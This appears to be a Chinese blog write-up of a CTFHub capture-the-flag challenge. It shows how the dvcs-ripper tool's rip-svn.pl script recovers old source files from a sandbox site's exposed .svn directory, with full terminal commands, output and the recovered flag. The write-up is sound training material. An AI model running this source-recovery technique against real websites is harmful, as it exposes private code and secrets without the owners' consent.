信息泄露-SVN泄露(信息泄露 - Subversion)

博客介绍了从服务端旧版本源代码中获取Flag的方法,使用工具dvcs-ripper。先在KALI系统安装perl,从GitHub下载dvcs-ripper并解压,然后按步骤使用该工具,通过执行perl脚本从SVN获取相关文件,最终得到Flag。

Flag 在服务端旧版本的源代码中

这个题目主要是使用工具(dvcs-ripper)

 KALI安装方法

 先安装perl

┌──(root㉿kali)-[~]
└─# sudo apt-get install perl libio-socket-ssl-perl libdbd-sqlite3-perl libclass-dbi-perl libio-all-lwp-perl

https://github.com/kost/dvcs-ripper 下载dvs-ripper。我是直接用浏览器下载到Download下,解压出来使用

工具使用步骤

dvcs-ripper┌──(root㉿kali)-[~/Downloads]
└─# cd dvcs-ripper-master
                                                                                                                    
┌──(root㉿kali)-[~/Downloads/dvcs-ripper-master]
└─# ll
总用量 80
-rw-r--r-- 1 root root  3855  8月 17  2020 hg-decode.pl
-rw-r--r-- 1 root root 18027  8月 17  2020 LICENSE
-rw-r--r-- 1 root root  5597  8月 17  2020 README.md
-rwxr-xr-x 1 root root  6401  8月 17  2020 rip-bzr.pl
-rwxr-xr-x 1 root root  4717  8月 17  2020 rip-cvs.pl
-rwxr-xr-x 1 root root 15114  8月 17  2020 rip-git.pl
-rwxr-xr-x 1 root root  6102  8月 17  2020 rip-hg.pl
-rwxr-xr-x 1 root root  6157  8月 17  2020 rip-svn.pl
                                                                                                                    
┌──(root㉿kali)-[~/Downloads/dvcs-ripper-master]
└─# perl ./rip-svn.pl -u http://challenge-a7f19eac21db43aa.sandbox.ctfhub.com:10800/.svn/
[i] Found new SVN client storage format!
REP INFO => 1:file:///opt/svn/ctfhub:e43e7ef8-82fb-4194-9673-81c29de69c33
[i] Trying to revert the tree, if you get error, upgrade your SVN client!
已恢复“index.html”
                                                                                                                    
┌──(root㉿kali)-[~/Downloads/dvcs-ripper-master]
└─# tree .svn                          
.svn
├── entries
├── format
├── pristine
│   ├── 46
│   │   └── 4686299be782a1432aed98556b0326d568d66c9e.svn-base
│   └── bf
│       └── bf45c36a4dfb73378247a6311eac4f80f48fcb92.svn-base
├── text-base
├── tmp
├── wc.db
└── wc.db-journal

5 directories, 6 files
                                                                                                                    
┌──(root㉿kali)-[~/Downloads/dvcs-ripper-master]
└─# cat 4686299be782a1432aed98556b0326d568d66c9e.svn-base
cat: 4686299be782a1432aed98556b0326d568d66c9e.svn-base: 没有那个文件或目录
                                                                                                                    
┌──(root㉿kali)-[~/Downloads/dvcs-ripper-master]
└─# cat bf45c36a4dfb73378247a6311eac4f80f48fcb92.svn-base
cat: bf45c36a4dfb73378247a6311eac4f80f48fcb92.svn-base: 没有那个文件或目录
                                                                                                                    
┌──(root㉿kali)-[~/Downloads/dvcs-ripper-master]
└─# cat ./svn/bf45c36a4dfb73378247a6311eac4f80f48fcb92.svn-base
                                                                                                                    
┌──(root㉿kali)-[~/Downloads/dvcs-ripper-master]
└─# ll
总用量 84
-rw-r--r-- 1 root root  3855  8月 17  2020 hg-decode.pl
-rw-r--r-- 1 root root   221 10月 30 08:29 index.html
-rw-r--r-- 1 root root 18027  8月 17  2020 LICENSE
-rw-r--r-- 1 root root  5597  8月 17  2020 README.md
-rwxr-xr-x 1 root root  6401  8月 17  2020 rip-bzr.pl
-rwxr-xr-x 1 root root  4717  8月 17  2020 rip-cvs.pl
-rwxr-xr-x 1 root root 15114  8月 17  2020 rip-git.pl
-rwxr-xr-x 1 root root  6102  8月 17  2020 rip-hg.pl
-rwxr-xr-x 1 root root  6157  8月 17  2020 rip-svn.pl
                                                                                                                    
┌──(root㉿kali)-[~/Downloads/dvcs-ripper-master]
└─# cat .svn/pristine/46/4686299be782a1432aed98556b0326d568d66c9e.svn-base
ctfhub{4ea39273d38cecaefeae5a9a}
                                                                                                                    
┌──(root㉿kali)-[~/Downloads/dvcs-ripper-master]
└─# cat .svn/pristine/bf/bf45c36a4dfb73378247a6311eac4f80f48fcb92.svn-base    
<html>

<head>
    <meta charset="UTF-8" />
    <title>CTFHub 信息泄露 SVN</title>
</head>

<body>
    <h1>信息泄露 - Subversion</h1>
    <br/>
    <p>Flag 在服务端旧版本的源代码中</p>
</body>

</html>                                                                                                                    
┌──(root㉿kali)-[~/Downloads/dvcs-ripper-master]
└─#

评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值